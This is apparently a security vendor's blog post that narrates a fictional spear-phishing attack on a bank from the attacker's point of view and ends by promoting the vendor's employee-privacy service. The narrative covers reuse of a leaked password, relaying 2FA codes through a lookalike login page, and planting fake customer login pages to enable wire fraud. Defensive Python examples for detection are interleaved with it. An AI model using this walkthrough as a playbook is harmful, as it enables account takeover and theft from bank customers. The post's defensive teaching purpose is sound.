While common email tools and cybersecurity firewalls are getting better at filtering out the most egregious phishing attempts, highly personalized and effective spear phishing attacks remain a threat.
Today’s successful spear phishing emails are nearly indistinguishable from emails sent by legitimate vendors, customer support teams, and the thousands of other emails organizations receive on a daily basis.
Spear phishing targets outsized payoffs: attackers attempt to steal tens, and sometimes hundreds, of thousands of dollars.
Given that priming employees on phishing does not seem to reduce successful phishing attempts, spear phishing is likely to remain a threat to organizations irrespective of their investment in employee training or cybersecurity protocols.
And these attacks aren’t slowing down.
According to the APWG, phishing attacks reached new quarterly highs each quarter of 2022, rising from slightly over 1 million in Q1 to over 1.2 million by Q3.
Notably, this rise was due to “a large number of attacks from a few persistent phishers” on “specific targets.”
Ironically, the leading medium of successful attacks on organizations is a low-tech, manual effort that is not at all accounted for by the downstream cybersecurity arms race.
Many Privacy Bee customers are surprised to learn the lengths that spear phishers go to when planning and deploying their attacks.
Attackers are dedicated, persistent, and highly motivated by outsized potential payoffs. They’re uniquely, maliciously creative.
Whether attackers attempt extortion, or fraudulent wire transactions, or another nefarious end goal, initial spear phishing emails are often the main entry point into an organization.
Reconsidering the Story of a Successful Spear Phishing Attack
We’ve found the narrative and the timeline of a spear phishing attack is not often well understood. That’s what we hope to address in this piece. We’ll explore how such targeted, sophisticated attacks are put together, so we can better discuss effective defense strategies.
By way of example, we’ll break down what a modern successful attack could look like, in thorough detail. This article will tell the story of a (fictitious) modern spear phishing attack, including characters, timelines of events, and the real tools they would use.
If this attacker is successful in breaching your organization, your business stands to lose millions directly, and many millions more to damages.
The Anatomy of a Successful Spear Phishing Attack

The average cyber attack unfolds over about 367 days, and attackers targeting organizations generally follow the same 6 steps:
- Reconnaissance: Scope the digital landscape for possible targets/organizations.
- Identify Weaknesses: The most exploited organizational vulnerability is External Data Privacy; often this phase includes compiling a list of employees who have sufficient digital exposure.
- Research Targets: Collected information can be taken from personal social profiles, previous data breaches, or data brokers.
- Create Payloads: While often crafted as targeted messages, payloads and delivery methods can vary widely.
- Intrusion Attempt: Deliver payload, attempting to breach the organization.
- Data Breach: Once the payload has been delivered, perhaps by spear phishing, your organization is breached and exploited.
Notably, long before an intrusion attempt is made, attackers have already targeted your organization and very likely have selected specific employees to target.
The only commonality between attackers is their end goal. 93% of breaches on organizations are financially motivated.
What the attack looks like and how it’s delivered varies. Attackers have compromised HR logins to redirect entire payrolls. They’ll swipe business credit credentials to purchase digital gift cards. Sometimes, they’ll conduct covert business espionage and sell their findings to the highest anonymous bidder.
The first step is always reconnaissance – taking a broad look at the digital landscape, to assess opportunities.
Step One: Reconnaissance
(0 – 30 days)
By way of example, assume an attacker wants to gain access to a financial services firm. They plan to convert fraudulent transfers from the platform or its customers into cryptocurrency.
In our case, our attacker has begun with the end in mind, more or less. They want access to a bank, or financial services platform, in order to steal funds through a wire and purchase cryptocurrency on an unregulated exchange.
If they pull that off, they can “tumble” (launder) the digital currency to achieve relative anonymity.
They know they only want to target companies of a certain size (100 to 1,000 employees). These organizations have more digital exposure and, of course, more funds to steal. Our attacker did his homework and pulled together a list of about 200 possible target companies.
As the attacker, you would now set out to determine:
- Which organizations are most vulnerable to attack?
- Which people have sufficient access/permissions, and what can I learn that might make them easy targets?
Step Two: Identify External Data Weaknesses
(30 – 60 days)
With a list of potential target organizations, you (the attacker) begin prodding the surface-level web presence of the companies and their people. You’re also keeping an eye out to identify individual attack targets.
This can be more time-consuming. Ultimately, you intend to deliver a spear phishing email that gives you access to sensitive login details.
You start with a scrape of the companies’ LinkedIn pages, to find people with specific job titles.
One such LinkedIn page is for a mid-sized West Coast bank. You’ve pulled a list of 605 of their employees, narrowed those down by job title, and end up with a list of 20 employees who might have admin authority over the bank’s website, its banking platform, or both.
This is a fine start. You decide to dig in.
Step Three: Target External Data Research
(30 – 180 days)
Cybersecurity experts, IT Teams, and CISOs operate on constant alert, ready to jump on an attack or breach the moment one is identified.
Not you. The nice thing about being a “bad actor” is that you get to operate on your own schedule. Patience and time are your allies, unlike your opposition.
Among other things, this means you can afford to take your time to build a detailed understanding of your potential targets. For example, you can track down all 20 people’s social media profiles and monitor them for a few weeks.
One such profile is Amanda Smith, a fictional marketing associate in fictional Acme Bank’s West Coast offices. Amanda was married in the fall. She posts photos of her dog Tipper, in a condo in Calabasas, on her public Instagram account.
With about 30 minutes of review, you’ve built a decent profile on Amanda. You plug her details into a spreadsheet alongside which you’ve collected data on dozens of other possible targets.
| Field | Value |
|---|---|
| Title | JR. HR Associate |
| Social Handle | @fakeAmanda |
| Phone Number (verified) | |
| Notes | Dog named Tippy. Condo in Calabasas. Newlywed (to Tom). Graduated Santa Barbara 2018. Travels with friends (Martha, Tom, Jim). Friends/associates with Mark Jones (Head of Marketing & Comms). |
After plugging in her social profile to a tool like Apollo, you flesh out Amanda’s details with her personal email address, more social accounts, previous employer, family members’ names, and her cell phone number.
Finding Your Real Attack Target
One of the biggest discoveries during your research is that Amanda often posts photos with her team, including the Head of Marketing and Communications Mark Jones (a great target), at after-hours work hangouts. They seem close.
But your access to him is limited. His profiles are private, and he seems to be relatively inactive on social media. You’ve scoured data brokers and people finders but have found no obvious vulnerabilities.
Amanda is a different story.
Matching Legal Data with Illegal Data to Get Results
Having gleaned what you can from Amanda’s social profiles, you turn to the dark underside of the web to see what can be found.
Nefarious organizations buy and sell large swaths of data, including breached passwords and associated email addresses, on the dark web.
Amanda’s personal email password was exposed once – in the Yahoo data breach of 2013. You bought an old database of hundreds of thousands of emails and passwords for a little over $20 USD.
Not surprisingly though, that email password has been changed. It didn’t work for her personal or work email addresses.
But as a semi-sophisticated attacker, you’ve learned every possibility is worth a shot.
So you open Instagram, plug in her username and try the outdated password you found.
It works.
No two-factor authentication enabled: you are now logged into Amanda Smith’s Instagram. A bit giddy now, you scour her personal DMs, where you find off-the-record work gripes with Mark Jones.
You’re also not a fool, so you don’t do anything that will leave a trace. You leave your burner phone logged in – content to monitor for weeks, or months, on end.
You’re waiting for the right time, to send the right message.
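Here is the check a defender would run against the weakness this section turns on: a password exposed years ago that still works somewhere else, on an account with no second factor. The Python below is an added illustration, not code from the original article or from Privacy Bee. The tiny breach corpus, the password strings and the `range_query` stand-in for a k-anonymity lookup service are all constructed for the demo.

```python
import hashlib

# Constructed toy breach corpus. Plaintexts appear here only so the demo can
# build the hashes; a real screening service stores SHA-1 digests and counts.
_TOY_BREACHED = {"password123": 1200, "Tipper2013!": 3, "letmein": 900}
BREACH_CORPUS = {
    hashlib.sha1(pw.encode()).hexdigest().upper(): n for pw, n in _TOY_BREACHED.items()
}


def range_query(prefix: str) -> dict:
    """Simulates a k-anonymity 'range' endpoint (the Pwned Passwords pattern):
    the caller sends only the first five hex characters of the SHA-1 and gets
    back every stored suffix sharing that prefix. The service never learns the
    full hash, let alone the password."""
    if len(prefix) != 5:
        raise ValueError("prefix must be exactly 5 hex characters")
    return {h[5:]: n for h, n in BREACH_CORPUS.items() if h.startswith(prefix)}


def breach_count(password: str) -> int:
    """How many breach records contain this password (0 if none)."""
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    return range_query(digest[:5]).get(digest[5:], 0)


def evaluate_account(password: str, mfa_enabled: bool) -> list:
    """Findings a defender would act on for one account: a breached password
    is forced to rotate, and an account without a second factor is flagged
    because a leaked password alone is then enough to log in."""
    findings = []
    n = breach_count(password)
    if n:
        findings.append(f"password appears in {n} breach record(s): force a reset")
    if not mfa_enabled:
        findings.append("no second factor: a reused password alone grants access")
    return findings


if __name__ == "__main__":
    # Amanda's situation in the story: an old leaked password, no 2FA.
    for finding in evaluate_account("Tipper2013!", mfa_enabled=False):
        print(finding)
```

Run at signup, at password change and on a periodic sweep of existing accounts, the same two checks close the exact door the attacker walked through here. The hash-prefix lookup matters because the screening service should not receive the password or even its full hash.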
Step Four: Crafting the Spear Phishing Message
(Day 60 – 270)
A few weeks have gone by.
You’ve determined Mark Jones (the fictional Head of Marketing) would be a great final target.
After kicking around a few different options, you’ve decided to try to use a login collection screen to get access to Mark Jones’ Gmail.
Building a fake login screen is easy. The difficult part will be getting Mark to submit his login information, unwittingly.
This is where your research and preparation pay off. Your best shot is to try to slip a spear phishing message through – via Amanda’s Instagram.
You’ve learned quite a bit about Amanda and Mark over the past few weeks.
From public-facing social profiles alone, you know their team gets food together after working hours once every other week.
Mark and Amanda have worked together for about 3 years. Their team is pretty small – a maximum of 5 people. Amanda is frequently writing on the bank’s blog, and the team structure suggests she reports directly to Mark.
That’s all you need to know.
In the early hours of the morning, you turn off notifications for Amanda’s Instagram through in-app settings.
Then you message Mark.
Step Five: The Data Breach Intrusion Attempt
“Hey Mark, are we in this meeting together? {gool.cal.co/alfkds}”
Now, you wait with bated breath. The link looks legit – but cal.co is a random domain you purchased, set up with a subdomain of “gool.” The site hosts your fake Gmail login page.
After inputting his email and password, Mark will receive a real two-factor authentication code from Google. That code is triggered by you, because you plugged his credentials into the real Google login.
He’ll submit that code to your fake login page as well. This is sent directly to you, in plain text, and you’ll plug it into the real Google login.
Bingo. You’re in.
To cover your tracks a bit, Mark is finally redirected from your fake login with a brief “success message” to calendar.google.com.
Only 3 minutes later, Mark writes back: “hm, which meeting? I can’t tell.”
You erase both messages from Amanda’s Instagram and re-enable notifications. You also forward your phishing domain permanently to calendar.google.com.
She’ll see nothing if she checks her phone. Mark will be sent to calendar.google.com if he ever clicks the link again. He might make a remark to Amanda in passing, but hopefully, they’ll each write it off as a miscommunication.
If they do notice, it won’t matter much to you. With your login successfully phished, you only require days or hours to complete your attack.
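The step just described, forwarding a one-time code in real time, is the reason SMS and authenticator-app codes do not stop a live phishing proxy while phishing-resistant MFA does. The Python simulation below is an added example, not from the original article or from Privacy Bee: it runs the OTP relay, then the same relay against an origin-bound credential of the WebAuthn kind. The IdP origin `accounts.example-idp.test` is invented, and an HMAC stands in for the authenticator's asymmetric signature.

```python
import hashlib
import hmac
import secrets
import struct

# Hypothetical origins for the simulation. The IdP host is invented; the
# lookalike host is the one from the story above.
IDP_ORIGIN = "https://accounts.example-idp.test"
PHISH_ORIGIN = "https://gool.cal.co"


def totp(secret: bytes, time_step: int) -> str:
    """RFC 6238-style six-digit code. It depends only on the shared secret and
    the time step: nothing in it records where the user typed it."""
    mac = hmac.new(secret, struct.pack(">Q", time_step), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    number = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{number % 1_000_000:06d}"


def sign_assertion(key: bytes, challenge: bytes, origin: str) -> bytes:
    """Stand-in for the authenticator's signature. Real WebAuthn uses an
    asymmetric key pair; an HMAC keeps this demo dependency-free, but the
    property shown is the same: the browser's origin is part of what is signed."""
    return hmac.new(key, challenge + origin.encode(), hashlib.sha256).digest()


class IdentityProvider:
    """The real login service, holding the user's TOTP secret and credential key."""

    def __init__(self):
        self.totp_secret = secrets.token_bytes(20)
        self.credential_key = secrets.token_bytes(32)

    def login_with_totp(self, code: str, time_step: int) -> bool:
        return hmac.compare_digest(code, totp(self.totp_secret, time_step))

    def new_challenge(self) -> bytes:
        return secrets.token_bytes(32)

    def login_with_assertion(self, challenge: bytes, signed_origin: str,
                             signature: bytes) -> bool:
        # Accept only a signature made over this IdP's own origin.
        expected = sign_assertion(self.credential_key, challenge, IDP_ORIGIN)
        return signed_origin == IDP_ORIGIN and hmac.compare_digest(signature, expected)


def victim_authenticator(idp, challenge: bytes, browser_origin: str):
    """The victim's browser hands the authenticator the origin it is really on."""
    return browser_origin, sign_assertion(idp.credential_key, challenge, browser_origin)


def simulate_otp_relay(idp, time_step: int) -> bool:
    """The story above: the victim types a valid code into the lookalike page
    and it is forwarded to the real IdP within the same time step."""
    code_typed_into_phish_page = totp(idp.totp_secret, time_step)
    return idp.login_with_totp(code_typed_into_phish_page, time_step)


def simulate_origin_bound_relay(idp) -> bool:
    """Same relay against an origin-bound credential. The challenge is real, but
    the victim's browser is on PHISH_ORIGIN, so that is what gets signed. Neither
    forwarding the assertion as-is nor relabelling its origin verifies."""
    challenge = idp.new_challenge()
    origin, signature = victim_authenticator(idp, challenge, PHISH_ORIGIN)
    forwarded_as_is = idp.login_with_assertion(challenge, origin, signature)
    relabelled = idp.login_with_assertion(challenge, IDP_ORIGIN, signature)
    return forwarded_as_is or relabelled


def simulate_legitimate_login(idp) -> bool:
    """Control case: the user really is on the IdP's origin."""
    challenge = idp.new_challenge()
    origin, signature = victim_authenticator(idp, challenge, IDP_ORIGIN)
    return idp.login_with_assertion(challenge, origin, signature)


if __name__ == "__main__":
    idp = IdentityProvider()
    print("OTP relay succeeds:        ", simulate_otp_relay(idp, 56_000_000))
    print("origin-bound relay succeeds:", simulate_origin_bound_relay(idp))
    print("legitimate login succeeds: ", simulate_legitimate_login(idp))
```

The lesson for the account in the story is not "add MFA" but "add the right MFA": a code that the user can read and retype can be relayed, whereas a credential that signs the page's origin cannot be made to vouch for `gool.cal.co`.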
Step Six: Data Breach and Attack
(24 – 48 hours)
It may only be a matter of time before Mark and Amanda realize something is up and notify their cybersec team.
To complicate matters, after searching Mark’s inbox, he doesn’t seem to have any direct access to the banking platform.
But he does appear to be the WordPress administrator. A simple password reset is all you need to gain edit permissions for the bank’s website.
In a little under 90 minutes, you and an accomplice have crafted some good-looking customer login pages, almost identical to the bank’s own login screens. You deploy these to the bank’s website, on the bank’s own domain.
Just like you did with Gmail, you’ll collect every login that comes through in plain text, and you and your buddy will use that to log into the customer’s bank account.
Customers are sure to be upset if they can’t access their banking platform, and thus you cover your tracks again with a redirect to the original login screen. For at least a few hours, or perhaps even a couple of days, this subtle shift will go unnoticed by the bank’s staff.
In the time that your false login screen is live on the bank website, a little over 100 banking customers have attempted to log in through these phony profiles. Quietly, you remove it.
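The fake customer login pages only survive because nobody is watching the bank's own web root for new or changed pages. The following Python is an added example, not the article's or Privacy Bee's code, of a minimal integrity check that would have caught them: snapshot the document root, diff it against a known-good baseline, and escalate any new or changed page that collects a password, more so if it posts off-domain. The in-memory site, the host `www.acmebank.test` and the file paths are constructed for the demo.

```python
import hashlib
import re

# Constructed in-memory web root. In practice you would walk the real document
# root (plus WordPress theme and plugin directories) and read file bytes.
BASELINE_SITE = {
    "index.php": b"<?php require 'wp-blog-header.php';",
    "login/index.html": b"<form action='/session' method='post'>"
                        b"<input name='user'><input type='password' name='pw'></form>",
    "about.html": b"<h1>About Acme Bank</h1>",
}

# A later scan: one routine edit, plus a new page that looks like a login form
# and posts to the lookalike host from the story.
LATER_SITE = dict(BASELINE_SITE)
LATER_SITE["about.html"] = b"<h1>About Acme Bank</h1><p>Updated hours.</p>"
LATER_SITE["secure-login/index.html"] = (
    b"<form action='https://gool.cal.co/c' method='post'>"
    b"<input name='user'><input type='password' name='pw'></form>"
)


def snapshot(site: dict) -> dict:
    """Map each path to the SHA-256 of its content."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in site.items()}


def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Paths that appeared, disappeared, or changed since the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys()
                      if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def collects_password(data: bytes) -> bool:
    """True if the page contains a form with a password field."""
    text = data.decode("utf-8", errors="ignore").lower()
    return "<form" in text and ("type='password'" in text or 'type="password"' in text)


def posts_offsite(data: bytes, own_hosts: set) -> bool:
    """True if any form action points at a host outside the bank's own domains."""
    text = data.decode("utf-8", errors="ignore")
    for match in re.finditer(r"""action=['"]?https?://([^/'"\s]+)""", text):
        if match.group(1).lower() not in own_hosts:
            return True
    return False


def review(baseline_site: dict, current_site: dict, own_hosts: set):
    """Diff the two snapshots and rate every new or changed credential form."""
    diff = diff_snapshots(snapshot(baseline_site), snapshot(current_site))
    alerts = []
    for path in diff["added"] + diff["modified"]:
        data = current_site[path]
        if collects_password(data):
            severity = "high" if posts_offsite(data, own_hosts) else "medium"
            alerts.append((severity, path))
    return diff, alerts


if __name__ == "__main__":
    changes, findings = review(BASELINE_SITE, LATER_SITE, {"www.acmebank.test"})
    print(changes)
    print(findings)
```

A routine content edit shows up as a modification with no alert; the injected page shows up as an addition rated high. Running this from a host the web administrator cannot log into is what keeps a stolen WordPress credential from silencing the check.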
Late at night and early in the morning, you and your pals begin logging into accounts and executing small, fraudulent wire transactions.
To buy some time, you disable website support windows and change phone numbers. If you can keep the bank unaware for even just 48 hours, there’s a very strong chance you’ll get away with your money.
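On the bank's side, the wires themselves are detectable well inside those 48 hours: each one is small and may pass per-account limits, but they share a time of day, a brand-new payee and, in this story, one operator. The Python below is an added example, not from the article or from Privacy Bee, of two such rules run over a constructed wire log; the field names, account numbers, the payee `XCH-771` and the IP addresses are invented.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of outbound wire events (not real bank logs).
SAMPLE_WIRES = """\
2023-03-14T02:11:05 acct=1001 payee=XCH-771 amount=4800 new_payee=1 src_ip=203.0.113.7
2023-03-14T02:14:40 acct=1042 payee=XCH-771 amount=4950 new_payee=1 src_ip=203.0.113.7
2023-03-14T02:19:12 acct=1077 payee=XCH-771 amount=4700 new_payee=1 src_ip=203.0.113.7
2023-03-14T09:30:00 acct=1003 payee=LANDLORD-9 amount=2100 new_payee=0 src_ip=198.51.100.20
2023-03-14T02:31:55 acct=1090 payee=XCH-771 amount=4990 new_payee=1 src_ip=203.0.113.7
"""

OFF_HOURS = range(0, 6)            # 00:00 to 05:59 local time
WINDOW = timedelta(minutes=60)     # look-back for fan-in counting
FAN_IN_THRESHOLD = 3               # distinct source accounts before alerting


def parse_wire(line: str) -> dict:
    """Parse one 'timestamp key=value ...' event into a dict."""
    ts, *fields = line.split()
    rec = {"ts": datetime.fromisoformat(ts)}
    for field in fields:
        key, value = field.split("=", 1)
        rec[key] = value
    rec["amount"] = float(rec["amount"])
    rec["new_payee"] = rec["new_payee"] == "1"
    return rec


def detect_wire_fraud(log_text: str) -> list:
    """Return (rule, subject, detail) tuples for events worth a human's attention."""
    records = sorted((parse_wire(line) for line in log_text.splitlines() if line.strip()),
                     key=lambda r: r["ts"])
    alerts = []

    # Rule 1: a first-time payee added and paid in the small hours.
    for r in records:
        if r["ts"].hour in OFF_HOURS and r["new_payee"]:
            alerts.append(("off_hours_new_payee", r["acct"], r["payee"]))

    # Rule 2: many different customer accounts converging on one payee, or all
    # driven from one source IP, inside the window. Each wire alone is below
    # per-account limits; the fan-in across accounts is the pattern.
    for key in ("payee", "src_ip"):
        history = defaultdict(list)   # key value -> [(ts, acct), ...]
        alerted = set()
        for r in records:
            history[r[key]].append((r["ts"], r["acct"]))
            recent = {acct for ts, acct in history[r[key]] if r["ts"] - ts <= WINDOW}
            if len(recent) >= FAN_IN_THRESHOLD and r[key] not in alerted:
                alerted.add(r[key])
                alerts.append((f"fan_in_{key}", r[key], len(recent)))
    return alerts


if __name__ == "__main__":
    for alert in detect_wire_fraud(SAMPLE_WIRES):
        print(alert)
```

The daytime rent payment to an established payee raises nothing; the four night-time wires raise individual alerts, and the third of them trips the fan-in rules on both the shared payee and the shared source address. Holding wires that match the fan-in rule for manual review is cheap compared with the 72-hour freeze described below.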
The Fallout of a Successful Spear Phishing Attack
It’s about a day after your first wire that the bank begins to realize something is terribly wrong. They’ve begun freezing wire transactions, but as they don’t understand the extent of their breach, it’s a full 72 hours before they stop all transactions.
The cybersecurity team works overtime to trace the source of the breach back to Amanda and Mark – by day 3 they’ve discovered the traces of your malicious login pages.
Meanwhile, you’ve wired about half the stolen funds successfully. Those funds have already landed with a cryptocurrency exchange, and you’re nearly in the clear.
You still may not actually get away with this. Federal investigators are clever. It’s still likely that they tie this back to you, and perhaps they’ll recoup some of the funds. Half of all cases like these recover 93% of the total financial losses. Then again, 14% recover nothing at all.
But that’s to say nothing of the indirect and personnel costs suffered by the bank.
Alongside Amanda, the bank’s CISO and their immediate report are let go in the following weeks. The rehire costs for those two alone amount to hundreds of thousands of dollars. Their individual personal and career losses might be greater.
Then there’s the sheer loss of integrity the bank suffers in their customers’ eyes. The breach is disclosed to their clients, and in the subsequent weeks, hundreds of customers move a sum of hundreds of millions out of the bank. The shrinkage and stalled growth over the next few years will result in company-wide layoffs.
Of course, none of this matters much to you, the attacker. If you got away, perhaps with a few hundred thousand of untraceable funds, you consider this a job very well done. And you’re ready to lie in wait, for months or years more, until a new opportunity arises.
Cybersecurity Takeaways
This somewhat dramatic retelling does offer some important insights.
Notably, the CISO and cybersecurity team were not involved until post-breach. Time to detection, in this case, was only a few days; in about 20% of cyber attacks, detection takes months or more.
Another important point is how long the path of attack ultimately is. This is also common. Each successful exposure or breach enables further, more damaging breaches, and each subsequent stage of the attack relied on the initial human layer:
- Personal Credential Compromise (Instagram)
- Spear Phishing Message (The Human Element)
- Business Email Compromise
- Customer Credential Compromise
- Fraudulent Wire Transactions
It was the attackers’ significant access to personal details about Amanda and Mark, in particular, that enabled the initial breach into Mark’s email address.
Without significant External Data – background research on the employees, compromised personal logins, and an understanding of the personal relationships between team members – this kind of attack would not have been possible.
Most importantly, this example highlights the breadth of the risks presented at this social layer – the ultimate means and medium of attacks vary so greatly, they’re impossible to thoroughly predict or plan around.
Properly diversified defense strategies must take proactive approaches to mitigating the risks of social engineering and spear phishing.
Privacy Bee Removes Initial PII Exposures to Prevent Social Attacks
One such proactive defense strategy is an investment in employee data privacy.
Privacy Bee is a proactive employee privacy platform that helps CISOs, IT teams, and CTOs discover and reduce their employees’ privacy risks.
We scan the surface-level web for PII exposures across your teams, highlight and explain significant threats, and then advocate on your team’s behalf to remove data from data brokers, data breaches, and other sources. By reducing your exposures now, you prevent attackers from finding avenues of exploitation and reduce human error.
To see how it works, start a free employee privacy scan to see how exposed your team is. Or sign up for a free demo.